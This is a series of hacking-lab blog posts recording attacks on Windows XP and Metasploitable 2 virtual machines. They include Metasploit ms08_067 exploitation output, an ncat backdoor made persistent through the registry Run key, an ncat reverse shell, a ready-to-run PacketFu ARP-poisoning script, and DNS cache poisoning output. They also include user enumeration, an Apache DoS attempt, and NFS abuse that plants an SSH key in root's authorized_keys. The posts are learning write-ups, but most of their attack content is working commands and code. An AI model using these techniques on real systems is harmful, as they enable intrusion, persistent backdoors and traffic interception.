I just completed my first successful exploit in the marvellous Metasploit GUI Armitage.

Details of the target machine on my Virtual Hacking Lab:

Windows XP Pro Service Pack 2 (unpatched). Firewall and software updates switched off, Microsoft Internet Information Services (IIS) (server) and FTP service enabled, SQL Server 2005 Express configured, and a vulnerable web app up and running.

First up, I added the “Host” which is the target IP address.

Then right clicked the “Host” and performed the scan, which is a bundle of inbuilt Metasploit scans (ftp, smtp, http, smb_versions), each gleaning information on the target.

Note the “Host” terminal image now bears the Windows logo as the detected operating system during the scan.

Then up to the toolbar Attacks >> Find attacks.

Once complete we can right-click the “Host” and select “Attack” which gives us a list of potential exploits.

At this point I cheated as my very first command prompt Metasploit exploit on this target machine was via “exploit/windows/smb/ms08_067_netapi” so I simply selected this from “smb” in the dropdown list.

But first I checked the exploit:

So I launched the attack and within a few seconds the “Host” terminal image changed:

The red terminal with electrical jolts indicates a compromised target.

Here’s the Output of the process:

msf> use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > set LHOST 192.168.1.70
LHOST => 192.168.1.70
msf exploit(ms08_067_netapi) > set RPORT 445
RPORT => 445
msf exploit(ms08_067_netapi) > set LPORT 20855
LPORT => 20855
msf exploit(ms08_067_netapi) > set RHOST 192.168.1.79
RHOST => 192.168.1.79
msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(ms08_067_netapi) > set SMBPIPE BROWSER
SMBPIPE => BROWSER
msf exploit(ms08_067_netapi) > set TARGET 0
TARGET => 0
msf exploit(ms08_067_netapi) > exploit -j
[*] Exploit running as background job.
[*] Started bind handler
[*] Automatically detecting the target…
[*] Fingerprint: Windows XP – Service Pack 2 – lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (751104 bytes) to 192.168.1.79
[*] Meterpreter session 1 opened (192.168.1.70:57239 -> 192.168.1.79:20855) at 2013-09-02 18:27:27 +0100

meterpreter >

As you can see I have obtained an Meterpreter shell.

Right-clicking on the “Host” image now gives me “Meterpreter” in the dropdown with every conceivable option available at the click of a finger.

Metasploit Armitage is a fabulous tool.

Next time I’ll look to compromise an Ubuntu system that I’ve never exploited before.

First I exploited my Windows system with Metasploit Armitage obtaining a Meterpreter shell as per this post.

Then I needed to upload the ncat.exe file (which I download from here) to the target machine. In Armitage this is a breeze. Simply right-click the compromised terminal: >> Meterpreter1 >> Explore >> Browse Files. This give you a nice list of files on the exploited machine:

Notice the “Upload” button from which we transfer files over on to the target system. Once complete you can refresh and check your file is indeed within the C:\WINDOWS\system32 directory. Once found right-click the file and “Execute” which brings up the “Input Arguments” box:

As you can see I entered -l (listen) 23 (port) -e (execute) cmd (command shell)

I then opened a Terminal on the attacking machine and attempted to connect with Ncat on the the target machine:

~# ncat 192.168.1.79 23 <– Input target IP and specified port

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>

And as you can see this connection was successful. I can now close Metasploit and continue with this connection.

It’s worth noting that the -e command has an implicit “keep alive” element which means that Ncat stays up and running even after the connection is terminated.

It’s also worth noting that this is a non-persistent connection in that once the target machine is rebooted the connection is no longer available without executing the Ncat listener. This can be overcome through ensuring the Ncat.exe program is executed on start-up.

I’ll try to blog the solution to this and also create a reverse connection.

I couldn’t figure out how to do this in Armitage and so had to resort to the good ol’ Terminal.

I exploited the XP system as per this post and obtained an Meterpreter shell.

First to upload the Ncat.exe file to the target machine:

meterpreter > upload ncat.exe c:windowssystem32
[*] uploading : ncat.exe -> c:windowssystem32
[*] uploaded : ncat.exe -> c:windowssystem32ncat.exe
meterpreter >

Next we need to get Ncat to execute on startup so we manipulate the Windows Registry:

Sorry the above is an image, pasting in the code messed up WordPress.

Note the -l (listen) 5777 (port number) arguments are set at this point.

We can double check our program is in the registry:

meterpreter > reg enumkey -k HKLMsoftwaremicrosoftwindowscurrentversionrun
Enumerating: HKLMsoftwaremicrosoftwindowscurrentversionrun

Values (5):

VMware hqtray
TgZcTlqTJNmSbP
TIOzUGrTHgMzS
zmvSLZpTksgWih
ncat

meterpreter >

As we can see Ncat is included

Now to reboot the target XP machine and see if we can establish a connection:

# ncat 192.168.1.79 5777
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:Documents and SettingsLab1>

Voilà

Two issues to note.

Firstly a dirty great big command box is opened on startup which if the user closes, terminates our connection.

Secondly, I haven’t dealt with any tricky firewall issues that may prevent the inbound connection.

However, as a proof of concept, it works perfectly and I’m sure there are ways to prevent the command box opening so that the Ncat program runs without alerting the user.

This will probably be my last Ncat post for now as I really must get on with other things. If you want a comprehensive Ncat tutorial then hop over to IronGeek. Ncat really is a superb tool.

Previous posts have focussed on connecting to Ncap from a remote machine and although great fun, in the real world, the connection would likely be blocked by a firewall. One way around this is to create a reverse shell in which the target machine is reaching out to us. Obviously outbound connections are less regulated than inbound.

First we set up the Ncap ‘listerner’ on my machine (IP 192.168.1.70)

:~# ncat -l 8008 <– Listen on port 8008

Then the reverse shell on the target Windows machine:

C:\Documents and Settings\Lab1> ncat 192.168.1.70 8008 -e cmd <– Connect to IP 192.168.1.70 on port 8008 and execute command shell

Result on my machine:

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\Lab1>

Job done.

I wonder if it is possible to have Ncat run a reverse shell on startup similar to the backdoor example I blogged?

My very good online friend Adam has been reading my recent PacketFu blog posts and today sent me the challenge of ARP cache poisoning. And what an excellent challenge it has been. I knew vaguely of ARP Cache Poisoning but nothing concrete and so had to learn about the protocol, the principle of ARP Packet spoofing and cache poisoning, and then figure out how to so the same in PacketFu. Boy I’ve learnt a lot today.

Here’s how I did it:

x = PacketFu::ARPPacket.new(:flavor => “Windows”) <– New ARP Packet Object
x.eth_saddr=”04:7d:7b:c5:98:cf” <– Attacking MAC Address
x.eth_daddr=”00:0c:76:17:a4:17″ <– Target Mac Address
x.arp_saddr_mac=”04:7d:7b:c5:98:cf” <– Attacking MAC Address
x.arp_daddr_mac=”00:0c:76:17:a4:17″ <– Target Mac Address
x.arp_saddr_ip=’192.168.1.254′ <– “Spoofed” router IP Address
x.arp_daddr_ip=”192.168.1.79″ <– Target IP Address
x.arp_opcode=2 <– ARP “Reply”
x.to_w(‘eth0′) <– Put packet to wire

It all looks so simple laid out like this.

Once I rebooted the target machine and input arp -a in the command prompt the MAC address for the router IP had indeed changed to the attacking machine’s. The target machine’s traffic started flowing through Wireshark to the attacking machine.

I could no longer access the Internet on the target machine and so the next stage would be forwarding the target machine traffic to the router.

But that’s for another day.

Thanks again to Adam who bears the brunt every time I’m stuck with something and does so with extraordinary patience

UPDATE: Have blogged this including infinite looping with 30 second intervals.

Following on from my last post on ARP Packet Spoofing and Cache Poisoning using PacketFu, Adam advised me:

Just a helpful tip the ARP address entry will revert back to the original. ARP requests are sent on a regular basis so your spoofed address will be replaced with the correct one at some point. If you are running it as a program you just need to loop it on a time interval (60 seconds or so).

So, I needed to have the code loop with a time interval. This was achieved (eventually thanks to @zyx2k) by creating an infinite loop condition with 30 seconds “sleep” between each loop.

I’ve written the below code so that you can change the parameters, copy & paste, and run it in a Ruby file if you wish:

#!/usr/bin/env ruby
# encoding: UTF-8
require “packetfu”
puts “Sending ARP Packet Spoof Every 30 Seconds…”
x = PacketFu::ARPPacket.new(:flavor => “Windows”) # Flavor can be changed to Linux or hp_deskjet
x.eth_saddr=”04:7d:7b:c5:98:cf” # Set your MAC Address
x.eth_daddr=”00:0c:76:17:a4:17″ # Set victim MAC Address
x.arp_saddr_mac=”04:7d:7b:c5:98:cf” # Set your MAC Address
x.arp_daddr_mac=”00:0c:76:17:a4:17″ # Set victim MAC Address
x.arp_saddr_ip=’192.168.1.254′ # Router IP Address
x.arp_daddr_ip=”192.168.1.79″ # Victim IP Address
x.arp_opcode=2 # ARP Reply Code 
sunny=false # Condition Set
while sunny==false do # Infinite Loop created
x.to_w(‘wlan0′) # Put Packet to wire – Can change to eth0
sleep(30) # “Sleep” interval in seconds, change for your preference
end

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
23/tcp    open  telnet      Linux telnetd

Most of the information on the Internet talks of using a password cracking tool for this Telnet service; however, there is another way using a Metasploit scanner:

msf > search telnet
[!] Database not connected or cache not built, using slow search

Matching Modules
================

Name                                                Disclosure Date  Rank       Description
—-                                                —————  —-       ———–
auxiliary/admin/http/dlink_dir_300_600_exec_noauth  2013-02-04       normal     D-Link DIR-600 / DIR-300 Unauthenticated Remote Command Execution
auxiliary/dos/windows/ftp/iis75_ftpd_iac_bof        2010-12-21       normal     Microsoft IIS FTP Server Encoded Response Overflow Trigger
auxiliary/scanner/telnet/lantronix_telnet_password                   normal     Lantronix Telnet Password Recovery
auxiliary/scanner/telnet/lantronix_telnet_version                    normal     Lantronix Telnet Service Banner Detection
auxiliary/scanner/telnet/telnet_encrypt_overflow                     normal     Telnet Service Encyption Key ID Overflow Detection
auxiliary/scanner/telnet/telnet_login                                normal     Telnet Login Check Scanner
auxiliary/scanner/telnet/telnet_ruggedcom                            normal     RuggedCom Telnet Password Generator
auxiliary/scanner/telnet/telnet_version                              normal     Telnet Service Banner Detection
auxiliary/server/capture/telnet                                      normal     Authentication Capture: Telnet
exploit/freebsd/ftp/proftp_telnet_iac               2010-11-01       great      ProFTPD 1.3.2rc3 – 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
exploit/freebsd/telnet/telnet_encrypt_keyid         2011-12-23       great      FreeBSD Telnet Service Encryption Key ID Buffer Overflow
exploit/linux/ftp/proftp_telnet_iac                 2010-11-01       great      ProFTPD 1.3.2rc3 – 1.3.3b Telnet IAC Buffer Overflow (Linux)
exploit/linux/http/dlink_diagnostic_exec_noauth     2013-03-05       excellent  D-Link DIR-645 / DIR-815 diagnostic.php Command Execution
exploit/linux/http/dlink_dir300_exec_telnet         2013-04-22       excellent  D-Link Devices Unauthenticated Remote Command Execution
exploit/linux/http/dlink_upnp_exec_noauth_telnetd   2013-07-05       excellent  D-Link Devices UPnP SOAP Telnetd Command Execution
exploit/linux/telnet/telnet_encrypt_keyid           2011-12-23       great      Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow
exploit/solaris/telnet/fuser                        2007-02-12       excellent  Sun Solaris Telnet Remote Authentication Bypass Vulnerability
exploit/solaris/telnet/ttyprompt                    2002-01-18       excellent  Solaris in.telnetd TTYPROMPT Buffer Overflow
exploit/unix/webapp/dogfood_spell_exec              2009-03-03       excellent  Dogfood CRM spell.php Remote Command Execution
exploit/windows/proxy/ccproxy_telnet_ping           2004-11-11       average    CCProxy <= v6.2 Telnet Proxy Ping Overflow
exploit/windows/telnet/gamsoft_telsrv_username      2000-07-17       average    GAMSoft TelSrv 1.5 Username Buffer Overflow
exploit/windows/telnet/goodtech_telnet              2005-03-15       average    GoodTech Telnet Server <= 5.0.6 Buffer Overflow
payload/cmd/unix/reverse                                             normal     Unix Command Shell, Double reverse TCP (telnet)
payload/cmd/unix/reverse_bash_telnet_ssl                             normal     Unix Command Shell, Reverse TCP SSL (telnet)
payload/cmd/unix/reverse_ssl_double_telnet                           normal     Unix Command Shell, Double Reverse TCP SSL (telnet)
post/windows/gather/credentials/mremote                              normal     Windows Gather mRemote Saved Password Extraction

msf > use auxiliary/scanner/telnet/telnet_version
msf auxiliary(telnet_version) > show options

Module options (auxiliary/scanner/telnet/telnet_version):

Name      Current Setting  Required  Description
—-      —————  ——–  ———–
PASSWORD                   no        The password for the specified username
RHOSTS                     yes       The target address range or CIDR identifier
RPORT     23               yes       The target port
THREADS   1                yes       The number of concurrent threads
TIMEOUT   30               yes       Timeout for the Telnet probe
USERNAME                   no        The username to authenticate as

msf auxiliary(telnet_version) > set RHOSTS 192.168.1.103
RHOSTS => 192.168.1.103
msf auxiliary(telnet_version) > set RPORT 23
RPORT => 23
msf auxiliary(telnet_version) > run

[*] 192.168.1.103:23 TELNET _                  _       _ _        _     _      ____  \x0a _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \ \x0a| ‘_ ` _ \ / _ \ __/ _` / __| ‘_ \| |/ _ \| | __/ _` | ‘_ \| |/ _ \ __) |\x0a| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/ \x0a|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|\x0a                            |_|                                          \x0a\x0a\x0aWarning: Never expose this VM to an untrusted network!\x0a\x0aContact: msfdev[at]metasploit.com\x0a\x0aLogin with msfadmin/msfadmin to get started\x0a\x0a\x0ametasploitable login:
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(telnet_version) >

If we look carefully at the Telnet Banner we can see Login with msfadmin/msfadmin and so armed with the username and password we can connect via the attacking Terminal:

# telnet 192.168.1.103
Trying 192.168.1.103…
Connected to 192.168.1.103.
Escape character is ‘^]’.
_                  _       _ _        _     _      ____
_ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
| ‘_ ` _ \ / _ \ __/ _` / __| ‘_ \| |/ _ \| | __/ _` | ‘_ \| |/ _ \ __) |
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
|_|

Warning: Never expose this VM to an untrusted network!

Contact: msfdev[at]metasploit.com

Login with msfadmin/msfadmin to get started

metasploitable login: msfadmin
Password:
Last login: Tue Nov  5 13:12:09 EST 2013 on tty1
Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

To access official Ubuntu documentation, please visit:

http://help.ubuntu.com/

No mail.
To run a command as administrator (user “root”), use “sudo <command>”.
See “man sudo_root” for details.

msfadmin@metasploitable:~$

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
25/tcp    open  smtp        Postfix smtpd

Despite researching the Postfix email service, I haven’t uncovered an exploit; however, we can enumerate user information via Metasploit’s scanner

msf >search postfix smtp
[!] Database not connected or cache not built, using slow search

Matching Modules
================

Name                                                    Disclosure Date  Rank       Description
—-                                                    —————  —-       ———–
auxiliary/client/smtp/emailer                                            normal     Generic Emailer (SMTP)
auxiliary/dos/smtp/sendmail_prescan                     2003-09-17       normal     Sendmail SMTP Address prescan <= 8.12.8 Memory Corruption
auxiliary/dos/windows/smtp/ms06_019_exchange            2004-11-12       normal     MS06-019 Exchange MODPROP Heap Overflow
auxiliary/fuzzers/smtp/smtp_fuzzer                                       normal     SMTP Simple Fuzzer
   auxiliary/scanner/smtp/smtp_enum                                         normal     SMTP User Enumeration Utility
auxiliary/scanner/smtp/smtp_relay                                        normal     SMTP Open Relay Detection
auxiliary/scanner/smtp/smtp_version                                      normal     SMTP Banner Grabber
auxiliary/server/capture/smtp                                            normal     Authentication Capture: SMTP
auxiliary/vsploit/pii/email_pii                                          normal     VSploit Email PII
exploit/linux/misc/gld_postfix                          2005-04-12       good       GLD (Greylisting Daemon) Postfix Buffer Overflow
exploit/linux/smtp/exim4_dovecot_exec                   2013-05-03       excellent  Exim and Dovecot Insecure Configuration Command Injection
exploit/unix/smtp/clamav_milter_blackhole               2007-08-24       excellent  ClamAV Milter Blackhole-Mode Remote Code Execution
exploit/unix/smtp/exim4_string_format                   2010-12-07       excellent  Exim4 <= 4.69 string_format Function Heap Buffer Overflow
exploit/unix/webapp/squirrelmail_pgp_plugin             2007-07-09       manual     SquirrelMail PGP Plugin command execution (SMTP)
exploit/windows/browser/communicrypt_mail_activex       2010-05-19       great      CommuniCrypt Mail 1.16 SMTP ActiveX Stack Buffer Overflow
exploit/windows/browser/oracle_dc_submittoexpress       2009-08-28       normal     Oracle Document Capture 10g ActiveX Control Buffer Overflow
exploit/windows/email/ms07_017_ani_loadimage_chunksize  2007-03-28       great      Windows ANI LoadAniIcon() Chunk Size Stack Buffer Overflow (SMTP)
exploit/windows/http/mdaemon_worldclient_form2raw       2003-12-29       great      MDaemon <= 6.8.5 WorldClient form2raw.cgi Stack Buffer Overflow
exploit/windows/smtp/mailcarrier_smtp_ehlo              2004-10-26       good       TABS MailCarrier v2.51 SMTP EHLO Overflow
exploit/windows/smtp/mercury_cram_md5                   2007-08-18       great      Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow
exploit/windows/smtp/ms03_046_exchange2000_xexch50      2003-10-15       good       MS03-046 Exchange 2000 XEXCH50 Heap Overflow
exploit/windows/smtp/njstar_smtp_bof                    2011-10-31       normal     NJStar Communicator 3.00 MiniSMTP Buffer Overflow
exploit/windows/smtp/wmailserver                        2005-07-11       average    SoftiaCom WMailserver 1.0 Buffer Overflow
exploit/windows/smtp/ypops_overflow1                    2004-09-27       average    YPOPS 0.6 Buffer Overflow
exploit/windows/ssl/ms04_011_pct                        2004-04-13       average    Microsoft Private Communications Transport Overflow
post/windows/gather/credentials/outlook                                  normal     Windows Gather Microsoft Outlook Saved Password Extraction

msf use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) > show options

Module options (auxiliary/scanner/smtp/smtp_enum):

Name       Current Setting                                              Required  Description
—-       —————                                              ——–  ———–
RHOSTS                                                                  yes       The target address range or CIDR identifier
RPORT      25                                                           yes       The target port
THREADS    1                                                            yes       The number of concurrent threads
UNIXONLY   true                                                         yes       Skip Microsoft bannered servers when testing unix users
USER_FILE  /opt/metasploit/apps/pro/msf3/data/wordlists/unix_users.txt  yes       The file that contains a list of probable users accounts.

msf auxiliary(smtp_enum) > set RHOSTS 192.168.1.103
RHOSTS => 192.168.1.103

msf auxiliary(smtp_enum) > set RPORT 25
RPORT => 25
msf auxiliary(smtp_enum) > run

[*] 192.168.1.103:25 Banner: 220 metasploitable.localdomain ESMTP Postfix (Ubuntu)
[+] 192.168.1.103:25 Users found: , backup, bin, daemon, distccd, ftp, games, gnats, irc, libuuid, list, lp, mail, man, news, nobody, postgres, postmaster, proxy, service, sshd, sync, sys, syslog, user, uucp, www-data
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

As we can see users have been identified which might be useful in further attacks especially if any of the passwords are the same a the username.

I did connect to the Postfix email service via Telnet:

# telnet 192.168.1.103 25
Trying 192.168.1.103…
Connected to 192.168.1.103.
Escape character is ‘^]’.
220 metasploitable.localdomain ESMTP Postfix (Ubuntu)

I attempted to log on using the above user credentials, but was greeted with:

503 5.5.1 Error: authentication not enabled

So, presumably the Telnet connection is operational, but I simply don’t know how to take advantage of this.

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
53/tcp    open  domain      ISC BIND 9.4.2

It’s worth noting at the outset that neither of the below Metaploit Auxiliary’s worked for me; however, as I spent so much time researching and testing and learned whilst doing so, I’m going to detail the vulnerability as you might have success with this.

The premise of this Domain Name Server vulnerability is injecting spoofed information into the cache with the aim of overwriting and linking the details of one website with another. The consequence of this is that the user requests a website and a completely different website is served up.

The first exploit I tried was Metasploit’s Bailiwicked_Domain auxiliary

Description
===========

This exploit targets a fairly ubiquitous flaw in DNS implementations
which allow the insertion of malicious DNS records into the cache of the
target nameserver.  This exploit caches a single malicious nameserver
entry into the target nameserver which replaces the legitimate
nameservers for the target domain.  By causing the target nameserver to
query for random hostnames at the target domain, the attacker can spoof
a response to the target server including an answer for the query, an
authority server record, and an additional record for that server,
causing target nameserver to insert the additional record into the
cache.  This insertion completely replaces the original nameserver
records for the target domain.

Example
=======

# /msf3/msfconsole

                ##                          ###           ##    ##
 ##  ##  #### ###### ####  #####   #####    ##    ####        ######
####### ##  ##  ##  ##         ## ##  ##    ##   ##  ##   ###   ##
####### ######  ##  #####   ####  ##  ##    ##   ##  ##   ##    ##
## # ##     ##  ##  ##  ## ##      #####    ##   ##  ##   ##    ##
##   ##  #### ###   #####   #####     ##   ####   ####   #### ###
                                      ##

       =[ msf v3.2-release
+ -- --=[ 298 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
       =[ 73 aux

msf > use auxiliary/spoof/dns/bailiwicked_domain
msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D
RHOST => A.B.C.D
msf auxiliary(bailiwicked_domain) > set DOMAIN example.com
DOMAIN => example.com
msf auxiliary(bailiwicked_domain) > set NEWDNS dns01.metasploit.com
NEWDNS => dns01.metasploit.com
msf auxiliary(bailiwicked_domain) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_domain) > check
[*] Using the Metasploit service to verify exploitability...
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*]  >> ADDRESS: A.B.C.D  PORT: 50391
[*] FAIL: This server uses static source ports and is vulnerable to poisoning
msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D
[*] exec: dig +short -t ns example.com @A.B.C.D

b.iana-servers.net.
a.iana-servers.net.

msf auxiliary(bailiwicked_domain) > run
[*] Switching to target port 50391 based on Metasploit service
[*] Targeting nameserver A.B.C.D for injection of example.com. nameservers as dns01.metasploit.com
[*] Querying recon nameserver for example.com.'s nameservers...
[*]  Got an NS record: example.com.            171957  IN      NS      b.iana-servers.net.
[*]   Querying recon nameserver for address of b.iana-servers.net....
[*]    Got an A record: b.iana-servers.net.     171028  IN      A       193.0.0.236
[*]     Checking Authoritativeness: Querying 193.0.0.236 for example.com....
[*]     b.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*]  Got an NS record: example.com.            171957  IN      NS      a.iana-servers.net.
[*]   Querying recon nameserver for address of a.iana-servers.net....
[*]    Got an A record: a.iana-servers.net.     171414  IN      A       192.0.34.43
[*]     Checking Authoritativeness: Querying 192.0.34.43 for example.com....
[*]     a.iana-servers.net. is authoritative for example.com., adding to list of nameservers to spoof as
[*] Attempting to inject poison records for example.com.'s nameservers into A.B.C.D:50391...
[*] Sent 1000 queries and 20000 spoofed responses...
[*] Sent 2000 queries and 40000 spoofed responses...
[*] Sent 3000 queries and 60000 spoofed responses...
[*] Sent 4000 queries and 80000 spoofed responses...
[*] Sent 5000 queries and 100000 spoofed responses...
[*] Sent 6000 queries and 120000 spoofed responses...
[*] Sent 7000 queries and 140000 spoofed responses...
[*] Sent 8000 queries and 160000 spoofed responses...
[*] Sent 9000 queries and 180000 spoofed responses...
[*] Sent 10000 queries and 200000 spoofed responses...
[*] Sent 11000 queries and 220000 spoofed responses...
[*] Sent 12000 queries and 240000 spoofed responses...
[*] Sent 13000 queries and 260000 spoofed responses...
[*] Poisoning successful after 13250 attempts: example.com. == dns01.metasploit.com
[*] Auxiliary module execution completed

msf auxiliary(bailiwicked_domain) > dig +short -t ns example.com @A.B.C.D
[*] exec: dig +short -t ns example.com @A.B.C.D

dns01.metasploit.com.

It’s worth noting the “Check” switch doesn’t work anymore.

The second exploit I tried was Metasploit’s Bailiwicked_Host Auxiliary and the process is detailed in the below two videos:

Again, neither of these exploits worked for me, but hopefully you may have more success.

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
80/tcp    open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)

The Nessus scan had this to say regarding port 80:

55976 – Apache HTTP Server Byte Range DoS
Synopsis
The web server running on the remote host is affected by a denial of service vulnerability.
Description
The version of Apache HTTP Server running on the remote host is affected by a denial of service vulnerability. Making a series of HTTP requests with overlapping ranges in the Range or Request-Range request headers can result in memory and CPU exhaustion. A remote, unauthenticated attacker could exploit this to make the system unresponsive.

Exploit code is publicly available and attacks have reportedly been observed in the wild.

And so I went on a hunt looking for the code that is applicable to this version of the Apache server (2.2.8) and found it here, aptly called “The Apache Killer“.

The last few days OSS Web Admins are very concerned about a recent Apache HTTPd Denial Of Service. “Apache Killer (written by Kingcope)” is a perl script causing remote DoS through memory exhaustion to an apache httpd server. The script sends large amounts of HEAD requests with lots of ranges, resulting in swapping memory to filesystem on the remote side, making the remote system unstable.

While the vulnerability is publicly known from August 19, an official advisory haven’t been published yet. Although, a temp workaround must be found in order to avoid regular system crashes. The most efficient and elegant solution that i have read is using the mod_rewrite engine.

Let’s get our hands dirty to see how we can deal with the DoS remote attack.

The target system is an Ubuntu 8.04 with Apache/2.2.8 installation. Initially, i run the perl script to confirm that the system is vulnerable.

I download the code to my desktop and named the file: killapache.pl and ran in the terminal:

~/Desktop# perl killapache.pl 192.168.1.103 50
Host does not seem vulnerable

No matter what I tried I received the same non-vulnerable message. I was quite disappointed as this would have been my first DOS attack.

If we scan with OWASP ZAP or traverse to our browser and pop in the URL of our Metasplotable 2 we can see that there are various services running on the server on port 80 that may provide additional attack vectors; however, at this time I  was solely interested in attacking the Apache server itself.

I will be returning to explore some of these services in the due course.

The Nmap scan of Metasploitable 2 revealed:

PORT      STATE SERVICE     VERSION
111/tcp   open  rpcbind     2 (RPC #100000)

The SANS Institute has this to say about rcpbind and Portmapper:

What is Remote Procedure Call?

Remote Procedure Call is a technique for building distributed systems, and client/server applications. Basically, it allows a program on one machine to call a subroutine on another machine. RPC is not a transport protocol: rather, it is a method of using existing communications features in a transparent way. Request For Comments (RFC) 1833 (1-3) defines specifics about Remote Procedure Call, and some of its most well know aspects that apply to security specialists, particularly Port Mapper and rpcbind. The remote procedure protocol is documented and discussed in rfc 1790 (specific to Sun rpc) and rfc 1570 has additional information. If you use Unix servers and workstations you may be aware that there are applications that use RPC. There are NFS daemons, lock managers, and license managers. If you are a security manager, you will know that there are many know exploits against a large list of services (and more discovered every day). The first step dishonorably exploit a service is to determine if it is running on a target system. This is where Portmapper and rpcbind, and well-known port 111 come into play. This is also why the security administrators see many probes and scans of port 111.

Portmapper and rpcbind

The port mapper program maps a RPC program and version numbers to transport-specific port numbers. This program makes dynamic binding of remote programs possible. RPC server programs use ephemeral ports – thus the calling/client routine needs to access a well know port to be able to find those ports. Servers register themselves with a registrar – the port mapper (called rpcbind in Suns SVR4 and other systems using TI-RPC). This is done at port 111 for both UDP and TCP. Access to port 111 allows the calling client to query and identify the ephemeral ports where the needed server is running, and thereby make the connection to do business. When a client makes an RPC call to a given program number, it first connects to rpcbind on the target system to determine the address where the RPC request should be sent. Basically, the active port 111 is going to have a list of all active services, and tell the requesting client were to go to connect. However, security personnel should know that under some versions of Unix, and Solaris rpcbind not only listens on the TCP/UDP port 111, but it also listens on UDP ports greater than 32770. The exact port number is dependent on the OS release and architecture. Thus, packet filtering devices, router ACL blocks, and firewalls that are configured to block access to rpcbind/portmapper at only port 111, may be subverted by sending UDP requests to rpcbind listening above port 32770. This vulnerability may allow an unauthorized user to obtain remote RPC information from a remote system even if port 111 is being blocked.

So Why DO We Care?

RPC information located at Port 111 is a place to find out where services are running. Numerous vulnerabilities exist, along with exploits ready and waiting for services such as rpcbind and rpcmountd. Network File Service (NFS) has a known rpc-update exploit, the Network Information Service (NIS) update daemon rpc.ypupdated contains vulnerabilities in how it passes commands to certain function calls. This could allow a remote attacker to trick the service into executing arbitrary commands on the system with root privileges. Additionally, client server environments that use remote program calls and port 111 to register and make themselves available, are unfortunately also listing their availability to the less-than nice people who are trying to crack your system. For the unprotected systems that have portmapper running on port 111, a simple “rpcinfo” request is adequate for the potential exploiter to obtain a list of all services running.

So, we begin with “rpcinfo” in our Terminal to detect the services running on Metasploitable 2:

:~# rpcinfo -p 192.168.1.103
program vers proto   port  service
100000    2   tcp    111  portmapper
100000    2   udp    111  portmapper
100024    1   udp  39140  status
100024    1   tcp  57708  status
100003    2   udp   2049  nfs
100003    3   udp   2049  nfs
100003    4   udp   2049  nfs
100021    1   udp  53632  nlockmgr
100021    3   udp  53632  nlockmgr
100021    4   udp  53632  nlockmgr
100003    2   tcp   2049  nfs
100003    3   tcp   2049  nfs
100003    4   tcp   2049  nfs
100021    1   tcp  59788  nlockmgr
100021    3   tcp  59788  nlockmgr
100021    4   tcp  59788  nlockmgr
100005    1   udp  59646  mountd
100005    1   tcp  52735  mountd
100005    2   udp  59646  mountd
100005    2   tcp  52735  mountd
100005    3   udp  59646  mountd
100005    3   tcp  52735  mountd

Lots of information here. I’m going to concentrate on the NFS (Network File System) daemon as this is well documented.

First we begin with “Showmount”  which queries the mount daemon on a remote host for information about the state of the NFS server:

~# showmount -e 192.168.1.103
Export list for 192.168.1.103:
/ *

The The “/” shows the filesystem is writable and owned by root. Because SSH is running we generate a new SSH key on our attacking system, mount the NFS export, and add our key to the root user account’s authorized_keys file:

:~# ssh-keygen
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Created directory '/root/.ssh'.
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
93:8d:0f:e5:06:0a:2d:c1:5c:e4:39:8f:84:51:58:0a root@Dexter
The key's randomart image is:
+--[ RSA 2048]----+
|  Eoo*=          |
|   .+B .         |
|    = * . .      |
|     + = B       |
|      o S +      |
|         =       |
|          .      |
|                 |
|                 |
+-----------------+

:~# mkdir /tmp/r00t

:~# mount -t nfs 192.168.1.103:/ /tmp/r00t/ -o nolock

:~# cat ~/.ssh/id_rsa.pub >> /tmp/r00t/root/.ssh/authorized_keys

:~# umount /tmp/r00t

:~# ssh root@192.168.1.103
